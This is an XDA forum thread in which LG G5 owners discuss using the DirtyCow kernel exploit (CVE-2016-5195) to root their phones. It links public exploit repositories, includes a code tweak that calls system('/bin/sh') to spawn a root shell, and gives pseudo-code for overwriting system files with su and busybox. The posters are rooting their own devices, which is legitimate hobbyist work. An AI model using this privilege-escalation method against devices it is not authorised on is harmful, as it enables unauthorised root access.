If you gain root access you can have any mode that need root
No need to unlock bootloader
DirtyCow Test
- Thread starter Honestly Annoying
- Start date
No need to unlock bootloader
Hello, about the test dirtycow on lg g5, tell me the path where you want to put the halyard (dirtycow, run-as)
Dude, if you're going to PM me twice and quote me in a thread, at least make sure your message makes sense. I don't even know what you are asking...
Hey bro, I'm also following the V20 thread and I just want to know your thoughts, is it the same way to root the G5 ? I mean if it's successful on the V20, is there any chance to be "ported" to the G5 variants ?
Thank you and I'm here to help if you need some more tests ^^
Of course we have the chance. Just be a little patience and don't disturb dev.
I think if Honestly Annoying will need some help or test, he'll tell us.
Last edited:
to what extent can we modify system before triggering dm-verify.
Also, can I recover from dm-verify?
Edit: Ahahaha, I hope you didn't simply compile https://github.com/timwr/CVE-2016-5195, because this doesn't spawn a root shell. It's simply state that the file can spawn one. We need to replace
printf("uid %d\n", getuid()); with the right code.
It should be like this : system(""/bin/sh");
Edit2 : more like the cowexec from here https://github.com/jcadduono/CVE-2016-5195
It will not work because of selinux
Edit3: I have successfully restored my backed up run-as and did a full reboot, device is still fine. Is dm-verity triggered if we leave the exploit file there?
Edit4: Using cowexec, we have root access.. but... the root user is pretty much.. useless.. I think it would be better to check if it's possible to enable debug/disable dm-verity
(no luck editing hosts or trying to apply any form of bind/ln to the hosts file..)
Edit5: We need something like this https://github.com/scumjr/dirtycow-vdso or base our research more on this http://forum.xda-developers.com/general/security/dirty-cow-t3484879/page4
Also, can I recover from dm-verify?
Edit: Ahahaha, I hope you didn't simply compile https://github.com/timwr/CVE-2016-5195, because this doesn't spawn a root shell. It's simply state that the file can spawn one. We need to replace
printf("uid %d\n", getuid()); with the right code.
It should be like this : system(""/bin/sh");
Edit2 : more like the cowexec from here https://github.com/jcadduono/CVE-2016-5195
It will not work because of selinux
Edit3: I have successfully restored my backed up run-as and did a full reboot, device is still fine. Is dm-verity triggered if we leave the exploit file there?
Edit4: Using cowexec, we have root access.. but... the root user is pretty much.. useless.. I think it would be better to check if it's possible to enable debug/disable dm-verity
(no luck editing hosts or trying to apply any form of bind/ln to the hosts file..)
Edit5: We need something like this https://github.com/scumjr/dirtycow-vdso or base our research more on this http://forum.xda-developers.com/general/security/dirty-cow-t3484879/page4
Last edited:
https://su.chainfire.eu/
adb is an unpriviledged shell on stock ROMs. soon as run-as executes you are dropped back to UID 0.
pseudo-code:
Hope that gives some ideas.
adb is an unpriviledged shell on stock ROMs. soon as run-as executes you are dropped back to UID 0.
pseudo-code:
Code:
/bin/bash - {
copy all prerequisates to tmp
run background process to repeatedly flush ram (lg security)
shove su and other files with dirtycow, including busybox
run supersu installer as a background process.
wait for its exit code in background loop.
clean tmp
end ram flushing process
reboot device
}
Last edited:
Have Sprint Lg G5 - how can I help with testing?
---------- Post added at 01:29 PM ---------- Previous post was at 12:44 PM ----------
---------- Post added at 01:29 PM ---------- Previous post was at 12:44 PM ----------
Can you expand on why/how the root user is "useless"? Can you not install or flash certain programs, do you lose root on reboot...?
Awesome but I've to slow down your hype. You cannot install supersu only kingroot. That's because supersu only has systemless on >lollipop and this will brick. Xposed will work when you install it with Flashfire. So root+xposed will work, but only with special methods.
@dev keep up the good work, we're nearly able to root much phones.
@dev keep up the good work, we're nearly able to root much phones.
Hope you will do something good for all of us
sent via LG G5
sent via LG G5
Can you install kingroot and xposed now? All I need from root is xposed with modules. I can do all I want with xposed.
Sent from my LG-H850 using XDA-Developers mobile app
Last edited:
Because of selinux, the root user is pretty much useless. With dirtycow, we can appear as root, but when we actually try anything (like spawn a root shell) the system prevent us to do so.
Dirtycow is working great on device with selinux set to permissive but not on ours.
Thanks
Many thanks. Now I get it. Needing Selinux permissive makes sense.
Hope somebody comes through with a workaround!
Many thanks. Now I get it. Needing Selinux permissive makes sense.
Hope somebody comes through with a workaround!
Guys , you might want to check this out
https://github.com/timwr/CVE-2016-5195/issues/9#issuecomment-256776647
https://github.com/timwr/CVE-2016-5195/issues/9#issuecomment-256776647
You can't yet but it should be possible when the time comes.
This will be a quite good. So now we can only wait and hope[emoji4]
Sent from my LG-H850 using XDA-Developers mobile app
Even if we get a root shell, there will be no SuperSu or TWRP unless we get an unlocked bootloader. The goal is to get a root shell so we can work on getting an unlocked bootloader through a root shell and/or I can pull the system.img and make a custom system like with the G4. Just letting everyone know so I can stop getting all of these PMs asking "WHEN WILL I HAVE ROOT WHAT'S THE ETA ON SUPERSU GIVE ME ROOT"
Guys for the love of God don't bug the devs, you can all suggest solutions but don't ask for eta's.
Wait, I thought we needed root to run Xposed. So at least we can flash via Flashfire and (certain) Xposed modules will work?
Our Apps
Get our official app!
The best way to access XDA on your phone
Nav Gestures
Add swipe gestures to any Android
One Handed Mode
Eases uses one hand with your phone